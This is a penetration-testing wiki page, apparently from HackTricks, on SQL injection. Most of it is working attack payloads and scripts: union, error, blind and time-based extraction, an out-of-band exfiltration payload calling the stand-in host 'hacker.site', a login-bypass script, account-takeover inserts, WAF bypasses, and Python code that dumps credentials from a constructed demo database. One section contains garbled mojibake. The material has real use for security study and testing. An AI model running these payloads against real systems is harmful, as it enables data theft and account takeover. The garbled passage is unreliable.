SQL Injection
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
RootedCON is the most relevant cybersecurity event in Spain and one of the most important in Europe. With the mission of promoting technical knowledge, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
{% embed url="https://www.rootedcon.com/" %}
What is SQL injection?

A SQL injection is a security flaw that allows attackers to interfere with the database queries of an application. This vulnerability can enable attackers to view, modify, or delete data they should not be able to access, including information belonging to other users or any data the application itself can reach. Such actions may result in permanent changes to the application's functionality or content, or even in compromise of the server or denial of service.
Entry point detection

When a site appears to be vulnerable to SQL injection (SQLi) because the server responds unusually to SQLi-related input, the first step is to understand how to inject data into the query without breaking it. This requires identifying how to escape from the current context effectively. These are some useful examples:

```text
[Nothing]
'
"
`
')
")
`)
'))
"))
`))
```

Then you need to know how to fix the query so that it no longer errors. To fix the query you can either input data so that the original query accepts the new data, or you can input your data and append a comment symbol at the end.

Note that if you can see error messages, or if you can spot differences between a query that works and one that does not, this phase will be much easier.
Comments

```sql
MySQL
#comment
-- comment [Note the space after the double dash]
/*comment*/
/*! MYSQL Special SQL */

PostgreSQL
--comment
/*comment*/

MSSQL
--comment
/*comment*/

Oracle
--comment
/*comment*/

SQLite
--comment
/*comment*/

HQL
HQL does not support comments
```
Confirming with logical operations

A reliable way to confirm a SQL injection vulnerability is to execute a logical operation and observe the expected outcome. For instance, if a GET parameter such as ?username=Peter returns identical content when modified to ?username=Peter' or '1'='1, that indicates a SQL injection vulnerability.

Similarly, applying arithmetic operations serves as an effective confirmation technique. For example, if accessing ?id=1 and ?id=2-1 produces the same result, that is indicative of SQL injection.

Examples demonstrating logical operation confirmation:

```sql
page.asp?id=1 or 1=1 -- results in true
page.asp?id=1' or 1=1 -- results in true
page.asp?id=1" or 1=1 -- results in true
page.asp?id=1 and 1=2 -- results in false
```

Always pair a true condition with a false one (and 1=2): a page that simply ignores the parameter returns the same content for both, and only a real injection changes the response between them.

This word-list was created to try to confirm SQL injections in the proposed way:

{% file src="../../.gitbook/assets/sqli-logic.txt" %}
Confirming with timing

In some cases you won't notice any change on the page you are testing. Therefore, a good way to discover blind SQL injections is to make the DB perform actions that affect the time the page needs to load.

So we concatenate into the SQL query an operation that takes a long time to complete:

```sql
MySQL (string concat and logical ops)
1' + sleep(10)
1' and sleep(10)
1' && sleep(10)
1' | sleep(10)

PostgreSQL (only support string concat)
1' || pg_sleep(10)

MSSQL
1' WAITFOR DELAY '0:0:10'

Oracle
1' AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
1' AND 123=DBMS_PIPE.RECEIVE_MESSAGE('ASD',10)

SQLite
1' AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
1' AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
```

Measure the normal response time first and keep the delay small: a sleep placed in a WHERE clause fires once per row the database evaluates, so a 10 second sleep on a large table can stall the request (and the application) for far longer than 10 seconds.

In some cases the sleep functions won't be allowed. Then, instead of using those functions, you can make the query perform complex operations that take several seconds. Examples of these techniques are commented on separately for each technology (if any).
Identifying the back-end

The best way to identify the back-end is to try executing functions of the different back-ends. You can use the sleep functions of the previous section or these ones (table from payloadsallthethings):

```text
["conv('a',16,2)=conv('a',16,2)" ,"MYSQL"],
["connection_id()=connection_id()" ,"MYSQL"],
["crc32('MySQL')=crc32('MySQL')" ,"MYSQL"],
["BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)" ,"MSSQL"],
["@@CONNECTIONS>0" ,"MSSQL"],
["@@CONNECTIONS=@@CONNECTIONS" ,"MSSQL"],
["@@CPU_BUSY=@@CPU_BUSY" ,"MSSQL"],
["USER_ID(1)=USER_ID(1)" ,"MSSQL"],
["ROWNUM=ROWNUM" ,"ORACLE"],
["RAWTOHEX('AB')=RAWTOHEX('AB')" ,"ORACLE"],
["LNNVL(0=123)" ,"ORACLE"],
["5::int=5" ,"POSTGRESQL"],
["5::integer=5" ,"POSTGRESQL"],
["pg_client_encoding()=pg_client_encoding()" ,"POSTGRESQL"],
["get_current_ts_config()=get_current_ts_config()" ,"POSTGRESQL"],
["quote_literal(42.5)=quote_literal(42.5)" ,"POSTGRESQL"],
["current_database()=current_database()" ,"POSTGRESQL"],
["sqlite_version()=sqlite_version()" ,"SQLITE"],
["last_insert_rowid()>1" ,"SQLITE"],
["last_insert_rowid()=last_insert_rowid()" ,"SQLITE"],
["val(cvar(1))=1" ,"MSACCESS"],
["IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0" ,"MSACCESS"],
["cdbl(1)=cdbl(1)" ,"MSACCESS"],
["1337=1337", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
["'i'='i'", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
```

Also, if you have access to the output of the query, you can make it print the version of the database.
{% hint style="info" %} Next we are going to discuss different methods to exploit the different kinds of SQL injection. We will use MySQL as the example. {% endhint %}

Identifying with PortSwigger

{% embed url="https://portswigger.net/web-security/sql-injection/cheat-sheet" %}
Exploiting Union Based

Detecting number of columns

If you can see the output of the query, this is the best way to exploit it.

First of all, we need to find out the number of columns the initial request is returning. This is because both queries must return the same number of columns.

Two methods are typically used for this purpose:

Order/Group by

To determine the number of columns in a query, incrementally adjust the number used in ORDER BY or GROUP BY clauses until a false response is received. Despite the distinct functionalities of GROUP BY and ORDER BY within SQL, both can be used in the same way to ascertain the query's column count.

```sql
1' ORDER BY 1--+ #True
1' ORDER BY 2--+ #True
1' ORDER BY 3--+ #True
1' ORDER BY 4--+ #False - Query is only using 3 columns
#-1' UNION SELECT 1,2,3--+ True
```

```sql
1' GROUP BY 1--+ #True
1' GROUP BY 2--+ #True
1' GROUP BY 3--+ #True
1' GROUP BY 4--+ #False - Query is only using 3 columns
#-1' UNION SELECT 1,2,3--+ True
```

UNION SELECT

Select more and more null values until the query is correct:

```sql
1' UNION SELECT null-- - Not working
1' UNION SELECT null,null-- - Not working
1' UNION SELECT null,null,null-- - Worked
```

You should use null values because in some cases the type of the columns on both sides of the query must be the same, and null is valid in every case.

Extract database names, table names and column names

In the following examples we are going to retrieve the names of all the databases, the table names of a database, and the column names of a table (adjust the number of placeholder columns to the count you found above):

```sql
#Database names
-1' UniOn Select 1,2,gRoUp_cOncaT(0x7c,schema_name,0x7c) fRoM information_schema.schemata

#Tables of a database
-1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,table_name,0x7C) fRoM information_schema.tables wHeRe table_schema=[database]

#Column names
-1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,column_name,0x7C) fRoM information_schema.columns wHeRe table_name=[table name]
```

There is a different way to discover this data in every database, but the methodology is always the same.
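The column-count detection and the UNION extraction described above, automated as an added example (this is not code from the page): a Python script run against a constructed, deliberately injectable SQLite query that stands in for the MySQL back-end the page uses. The table and column names (products, users) are assumptions, and schema enumeration reads sqlite_master because SQLite has no information_schema.

```python
import sqlite3

# Constructed stand-in for the vulnerable application: an in-memory SQLite
# database instead of MySQL. Schema and sample rows are assumptions.
_db = sqlite3.connect(":memory:")
_db.executescript("""
CREATE TABLE products(id INTEGER, name TEXT, price REAL);
INSERT INTO products VALUES (1, 'widget', 9.5), (2, 'gadget', 12.0);
CREATE TABLE users(username TEXT, password TEXT);
INSERT INTO users VALUES ('admin', 's3cr3t'), ('bob', 'hunter2');
""")


def vulnerable_search(product_id):
    """The injectable query: user input concatenated straight into SQL.
    Returns the rows, or None when the query errors (what a tester sees as
    a generic error page)."""
    sql = f"SELECT name, price FROM products WHERE id = '{product_id}'"
    try:
        return _db.execute(sql).fetchall()
    except sqlite3.Error:
        return None


def count_columns_order_by(max_cols=20):
    """ORDER BY n succeeds while n <= column count and errors beyond it."""
    for n in range(1, max_cols + 1):
        if vulnerable_search(f"1' ORDER BY {n}-- -") is None:
            return n - 1
    return None


def count_columns_union_null(max_cols=20):
    """Add NULLs until the UNION stops erroring; NULL matches any column type."""
    for n in range(1, max_cols + 1):
        nulls = ",".join(["NULL"] * n)
        if vulnerable_search(f"1' UNION SELECT {nulls}-- -") is not None:
            return n
    return None


def list_tables():
    """Schema enumeration through the UNION. MySQL would read
    information_schema.tables as in the page; SQLite's catalogue is
    sqlite_master. The leading -1 makes the original WHERE match nothing,
    so only injected rows come back."""
    rows = vulnerable_search(
        "-1' UNION SELECT name, NULL FROM sqlite_master WHERE type='table'-- -")
    return sorted(name for name, _ in rows)


def dump_credentials():
    """With the column count known (2 here), place the interesting columns
    into the UNION and read them out of the application's normal output."""
    rows = vulnerable_search(
        "-1' UNION SELECT username, password FROM users-- -")
    return {username: password for username, password in rows}


if __name__ == "__main__":
    print("columns (ORDER BY):", count_columns_order_by())
    print("columns (UNION NULL):", count_columns_union_null())
    print("tables:", list_tables())
    print("credentials:", dump_credentials())
```

Both counting methods agree on 2 columns here; against a real target the ORDER BY probe is usually preferable because it needs no knowledge of column types, while the NULL probe additionally proves the UNION itself is accepted.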
Exploiting Hidden Union Based

When the output of a query is visible but a union-based injection seems unachievable, this signals the presence of a hidden union-based injection. This scenario often leads to a blind injection situation. To turn a blind injection into a union-based one, the query executed on the back-end needs to be discerned.

This can be accomplished by using blind injection techniques together with the default tables specific to the target Database Management System (DBMS). To understand these default tables, consult the documentation of the target DBMS.

Once the query has been extracted, it is necessary to tailor your payload so that it safely closes the original query. Then a union query is appended to the payload, which makes the newly accessible union-based injection exploitable.

For more comprehensive insights, refer to the complete article available at Healing Blind Injections.
Exploiting Error based

If for some reason you cannot see the output of the query but you can see the error messages, you can use those error messages to exfiltrate data from the database.

Following a flow similar to the union-based exploitation, you may be able to dump the DB.

```sql
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
```
Exploiting Blind SQLi

In this case you cannot see the results of the query or its errors, but you can distinguish whether the query returned true or false because the page shows different content in each case.

In this case, you can abuse that behaviour to dump the database char by char:

```sql
?id=1 AND (SELECT SUBSTR(table_name,1,1) FROM information_schema.tables LIMIT 1) = 'A'
```

Exploiting Error Blind SQLi

This is the same case as before, but instead of distinguishing between a true/false response from the query you can distinguish whether the SQL query errored or not (maybe because the HTTP server crashes). Therefore, in this case you can force a SQL error each time you guess the character correctly:

```sql
AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- -
```

Exploiting Time Based SQLi

In this case there is no way to distinguish the response of the query from the content of the page, but you can make the page take longer to load when the guessed character is correct. We have already seen this technique used above to confirm a SQLi vulnerability.

```sql
1 and (select sleep(10) from information_schema.tables where SUBSTR(table_name,1,1) = 'A' limit 1)#
```
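The char-by-char extraction behind the blind payloads above, as an added example (not the page's own code): a Python script against a constructed boolean oracle backed by SQLite, which stands in for the page's MySQL target. The users table and its contents are assumptions. It shows the linear guess loop the page describes and, beyond it, the binary search on the character code that practitioners normally use to cut the number of requests.

```python
import sqlite3
import string

# Constructed stand-in for a blind-injectable endpoint: SQLite instead of the
# page's MySQL, with assumed table and column names. The attacker never sees
# query output, only whether the page rendered a user or not.
_db = sqlite3.connect(":memory:")
_db.executescript("""
CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 'Zx9!pass');
""")


def page_shows_user(user_id):
    """Boolean oracle: True when the (injected) query still matches a row,
    False when it matches nothing or errors."""
    sql = f"SELECT username FROM users WHERE id = {user_id}"
    try:
        return _db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


# Candidates for the linear search; the quote and backslash are left out
# because they would break the injected string literal.
ALPHABET = [c for c in string.printable
            if c not in "'\\" and not c.isspace()]


def extract_linear(subquery, max_len=32):
    """Recover the scalar produced by `subquery` one character at a time by
    asking "is character N equal to X?" for every candidate X. The string is
    complete when no candidate matches at the next position."""
    result = ""
    for pos in range(1, max_len + 1):
        for ch in ALPHABET:
            payload = f"1 AND SUBSTR(({subquery}),{pos},1) = '{ch}'"
            if page_shows_user(payload):
                result += ch
                break
        else:
            break  # nothing matched: end of string
    return result


def extract_bisect(subquery, max_len=32):
    """Same oracle, but a binary search on the code point: about seven
    requests per character instead of one per candidate. SQLite's UNICODE()
    plays the role of MySQL's ASCII()/ORD()."""
    result = ""
    for pos in range(1, max_len + 1):
        if not page_shows_user(f"1 AND LENGTH(({subquery})) >= {pos}"):
            break
        lo, hi = 32, 126  # printable ASCII
        while lo < hi:
            mid = (lo + hi) // 2
            probe = f"1 AND UNICODE(SUBSTR(({subquery}),{pos},1)) > {mid}"
            if page_shows_user(probe):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


# The scalar we want; in MySQL this would typically target information_schema
ADMIN_PASSWORD = "(SELECT password FROM users WHERE username = 'admin')"

if __name__ == "__main__":
    print(extract_linear(ADMIN_PASSWORD))
    print(extract_bisect(ADMIN_PASSWORD))
```

One caveat when porting this to MySQL: its default collations are case-insensitive, so the equality probe of extract_linear cannot tell 'Z' from 'z'; compare against BINARY or use the ORD()-based bisection, which is exact.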
Stacked Queries

You can use stacked queries to execute multiple queries in succession. Note that while the subsequent queries are executed, their results are not returned to the application. Hence this technique is primarily useful for blind vulnerabilities, where you can use a second query to trigger a DNS lookup, a conditional error, or a time delay.

Oracle doesn't support stacked queries. MySQL, Microsoft SQL Server and PostgreSQL support them: QUERY-1-HERE; QUERY-2-HERE. In MySQL it also depends on the client library: PHP's mysql_query() and mysqli_query() reject multiple statements, while mysqli_multi_query() accepts them.

Out of band Exploitation

If no other exploitation method worked, you can try to make the database exfiltrate the information to an external host you control. For example, via DNS queries:

```sql
select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
```

Out of band data exfiltration via XXE

```sql
a' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.hacker.site/"> %remote;]>'),'/l') FROM dual-- -
```
Automated Exploitation

Check the SQLMap cheatsheet to exploit a SQLi vulnerability with sqlmap.

Tech specific info

We have already discussed all the ways to exploit a SQL injection vulnerability. Find some more tricks that depend on the database technology in this book: the dedicated pages for MS Access, MSSQL, MySQL, Oracle, PostgreSQL and Cypher (Neo4j).

You will also find a lot of tricks regarding MySQL, PostgreSQL, Oracle, MSSQL, SQLite and HQL in https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
Authentication bypass

List to try to bypass the login functionality:

{% content-ref url="../login-bypass/sql-login-bypass.md" %} sql-login-bypass.md {% endcontent-ref %}

Raw hash authentication Bypass

```php
"SELECT * FROM admin WHERE pass = '".md5($password,true)."'"
```

This query shows the vulnerability when MD5 is used with true for raw output in authentication checks, which makes the system susceptible to SQL injection. Attackers can exploit this by crafting inputs that, when hashed, produce unexpected SQL fragments, leading to unauthorized access.

```text
md5("ffifdyop", true) = 'or'6\xc9]\x99\xe9!r,\xf9\xedb\x1c
sha1("3fDf ", true) = Q�u'='�@�[�t�- o��_-!
```
æ³šå ¥ãããããã·ã¥èªèšŒãã€ãã¹
admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
æšå¥šãªã¹ã:
åè¡ã®ãªã¹ãããŠãŒã¶ãŒåãšããŠäœ¿çšãããã¹ã¯ãŒãã¯åžžã«: Pass1234.
(ãã®ãã€ããŒãã¯ããã®ã»ã¯ã·ã§ã³ã®æåã§èšåããã倧ããªãªã¹ãã«ãå«ãŸããŠããŸã)
{% file src="../../.gitbook/assets/sqli-hashbypass.txt" %}
GBK Authentication Bypass

If ' is being escaped you can use %A8%27. If ' gets escaped this will be created: 0xA80x5c0x27 (╘'). With a GBK connection charset the escaping routine inserts the 0x5C byte before the quote, but 0xA8 0x5C (or 0xBF 0x5C) is then read as one two-byte character, so the quote itself ends up unescaped.

```text
%A8%27 OR 1=1;-- 2
%8C%A8%27 OR 1=1-- 2
%bf' or 1=1 -- --
```

Python script:

```python
import requests

url = "http://example.com/index.php"
cookies = dict(PHPSESSID='4j37giooed20ibi12f3dqjfbkp3')
# The 0xBF lead byte must reach the server as a single raw byte, so the
# payload is built as bytes; a str would be sent UTF-8 encoded as C2 BF
datas = {"login": b"\xbf'OR 1=1 #", "password": "test"}
r = requests.post(url, data=datas, cookies=cookies, headers={'Referer': url})
print(r.text)
```
Polyglot injection (multicontext)

```sql
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
```
Insert Statement

Modify password of existing object/user

To do so you should try to create a new object named as the "master object" (probably admin in the case of users) while modifying something:

- Create a user named: AdMIn (uppercase & lowercase letters)
- Create a user named: admin=
- SQL Truncation Attack (when there is some kind of length limit on the username or email) --> Create a user with name: admin [a lot of spaces] a

SQL Truncation Attack

If the database is vulnerable and the max number of chars for the username is for example 30 and you want to impersonate the user admin, try to create a username called "admin [30 spaces] a" with any password.

The database will check whether the introduced username exists in the database. If not, it will cut the username to the max allowed number of characters (in this case to "admin [25 spaces]") and then automatically remove all the trailing spaces, updating the user "admin" in the database with the new password (some error could appear, but it doesn't mean this hasn't worked).

More info: https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideus.html & https://resources.infosecinstitute.com/sql-truncation-attack/#gref

Note: This attack will no longer work as described above on recent MySQL installations. While comparisons still ignore trailing whitespace by default, attempting to insert a string that is longer than the length of a field results in an error and the insertion fails, because sql_mode includes STRICT_TRANS_TABLES by default since MySQL 5.7. For more information about this check: https://heinosass.gitbook.io/leet-sheet/web-app-hacking/exploitation/interesting-outdated-attacks/sql-truncation
Insert time based checking

Add as many ','','' as you consider necessary to exit the VALUES statement. If a delay is executed, you have a SQL injection. Note that WAITFOR DELAY is MSSQL syntax and needs stacked queries; on MySQL use SLEEP() inside the value list instead.

```sql
name=','');WAITFOR%20DELAY%20'0:0:5'--%20-
```
ON DUPLICATE KEY UPDATE

MySQL's ON DUPLICATE KEY UPDATE clause specifies the action the database takes when an attempt is made to insert a row that would produce a duplicate value in a UNIQUE index or PRIMARY KEY. The following example demonstrates how this feature can be exploited to modify the password of an administrator account (it only works when the targeted column, here email, is covered by such a key):

Example Payload Injection:

An injection payload might be crafted as follows, attempting to insert two rows into the users table. The first row is a decoy, and the second row targets an existing administrator's email address with the intention of updating the password:

```sql
INSERT INTO users (email, password) VALUES ("generic_user@example.com", "bcrypt_hash_of_newpassword"), ("admin_generic@example.com", "bcrypt_hash_of_newpassword") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_newpassword" -- ";
```

Here's how it works:

- The query attempts to insert one row for generic_user@example.com and another for admin_generic@example.com.
- If the row for admin_generic@example.com already exists, the ON DUPLICATE KEY UPDATE clause triggers, instructing MySQL to update the password field of the existing row to "bcrypt_hash_of_newpassword".
- Consequently, authentication can then be attempted as admin_generic@example.com with the password corresponding to the bcrypt hash ("bcrypt_hash_of_newpassword" stands for the bcrypt hash of the new password and must be replaced with the real hash of the desired password).
Extract information

Creating 2 accounts at the same time

When trying to create a new user, a username, password and email are needed:

```text
SQLi payload:
username=TEST&password=TEST&email=TEST'),('otherUsername','otherPassword',(select flag from flag limit 1))-- -

A new user with username=otherUsername, password=otherPassword, email:FLAG will be created
```
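The two-accounts trick above, as an added example (not code from the page): a Python script against a constructed registration query on SQLite, which stands in for the MySQL target; the users and flag tables and their contents are assumptions. The injected email closes the first VALUES tuple early and appends a second row whose email column is a subquery, so the secret becomes readable from the attacker's own profile.

```python
import sqlite3

# Constructed stand-in for the registration endpoint: SQLite instead of MySQL,
# assumed table names. The flag lives in a table the attacker cannot query
# directly through the application.
_db = sqlite3.connect(":memory:")
_db.executescript("""
CREATE TABLE users(username TEXT, password TEXT, email TEXT);
CREATE TABLE flag(flag TEXT);
INSERT INTO flag VALUES ('FLAG{insert_based_exfil}');
""")


def vulnerable_register(username, password, email):
    """Registration query built by string concatenation."""
    sql = ("INSERT INTO users (username, password, email) "
           f"VALUES ('{username}','{password}','{email}')")
    _db.execute(sql)


def profile_email(username):
    """What the application shows on the user's own profile page."""
    row = _db.execute("SELECT email FROM users WHERE username = ?",
                      (username,)).fetchone()
    return row[0] if row else None


def exploit():
    """Send the page's payload in the email field and read the flag back
    from the second, attacker-defined account."""
    payload = ("TEST'),('otherUsername','otherPassword',"
               "(select flag from flag limit 1))-- -")
    vulnerable_register("TEST", "TEST", payload)
    return profile_email("otherUsername")


if __name__ == "__main__":
    print(exploit())
```

The trailing `-- -` swallows the application's own closing quote and parenthesis; without it the statement would not parse and nothing would be inserted, which is the usual reason this payload silently fails on the first try.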
Using decimal or hexadecimal

With this technique you can extract information by creating only 1 account. Note that you don't need to comment anything out.

Using hex2dec and substr:

```sql
'+(select conv(hex(substr(table_name,1,6)),16,10) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
```

To get the text back you can use:

```python
__import__('binascii').unhexlify(hex(215573607263)[2:])
```

Using hex and replace (and substr):

```sql
'+(select hex(replace(replace(replace(replace(replace(replace(table_name,"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'

'+(select hex(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'

#Full ascii uppercase and lowercase replace:
'+(select hex(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%"),"z","&"),"J","'"),"K","`"),"L","("),"M",")"),"N","@"),"O","$$"),"Z","&&")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
```

Why the replace() chain: the surrounding '+...+' is numeric addition, so the stored value is whatever prefix of the hex string parses as a number, and the first hex digit a-f would cut it short. The characters replaced (j=6A, k=6B, l=6C, m=6D, o=6F, _=5F, and the uppercase J-O and z/Z) are exactly those whose hex encoding contains a-f; they are swapped for characters whose encoding is purely decimal digits (space=20, !=21, "=22, #=23, $=24, %=25, &=26, '=27, `=60, (=28, )=29, @=40), and the mapping is reversed after decoding.
Routed SQL injection

Routed SQL injection is a situation where the injectable query is not the one that produces output; instead, the output of the injectable query goes into the query that produces the output. (From Paper)

Example:

```sql
#Hex of: -1' union select login,password from users-- a
-1' union select 0x2d312720756e696f6e2073656c656374206c6f67696e2c70617373776f72642066726f6d2075736572732d2d2061 -- a
```
WAF Bypass

Initial bypasses from here

No spaces bypass

No Space (%20) - bypass using whitespace alternatives

```sql
?id=1%09and%091=1%09--
?id=1%0Dand%0D1=1%0D--
?id=1%0Cand%0C1=1%0C--
?id=1%0Band%0B1=1%0B--
?id=1%0Aand%0A1=1%0A--
?id=1%A0and%A01=1%A0--
```

No Whitespace - bypass using comments

```sql
?id=1/*comment*/and/**/1=1/**/--
```

No Whitespace - bypass using parentheses

```sql
?id=(1)and(1)=(1)--
```

No commas bypass

No Comma - bypass using OFFSET, FROM and JOIN

```sql
LIMIT 0,1 -> LIMIT 1 OFFSET 0
SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d
```

Generic Bypasses

Blacklist using keywords - bypass using uppercase/lowercase

```sql
?id=1 AND 1=1#
?id=1 AnD 1=1#
?id=1 aNd 1=1#
```

Blacklist using keywords case insensitive - bypass using an equivalent operator

```sql
AND -> && -> %26%26
OR -> || -> %7C%7C
= -> LIKE,REGEXP,RLIKE, not < and not >
> X -> not between 0 and X
WHERE -> HAVING --> LIMIT X,1 -> group_concat(CASE(table_schema)When(database())Then(table_name)END) -> group_concat(if(table_schema=database(),table_name,null))
```
Scientific Notation WAF bypass

You can find a more in-depth explanation of this trick in the gosecure blog. Basically you can use scientific notation in unexpected ways to bypass the WAF:

```sql
-1' or 1.e(1) or '1'='1
-1' or 1337.1337e1 or '1'='1
' or 1.e('')=
```
Bypass Column Names Restriction

First of all, notice that if the original query and the table you want to extract the flag from have the same number of columns, you might just do: 0 UNION SELECT * FROM flag

It's possible to access the third column of a table without using its name with a query like the following: SELECT F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F; so in a SQL injection this would look like:

```sql
# demo has 3 columns; F.3 reads its third column without naming it
-1 UNION SELECT 0, 0, 0, F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;
```

Or using a comma bypass:

```sql
# In this case, it's extracting the third value from a 4 values table and returning 3 values in the "union select"
-1 union select * from (select 1)a join (select 2)b join (select F.3 from (select * from (select 1)q join (select 2)w join (select 3)e join (select 4)r union select * from flag limit 1 offset 5)F)c
```

This trick was taken from https://secgroup.github.io/2017/01/03/33c3ctf-writeup-shia/
WAF bypass suggester tools

{% embed url="https://github.com/m4ll0k/Atlas" %}

Other Guides

- https://sqlwiki.netspi.com/
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection

Brute-Force Detection List

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/sqli.txt" %}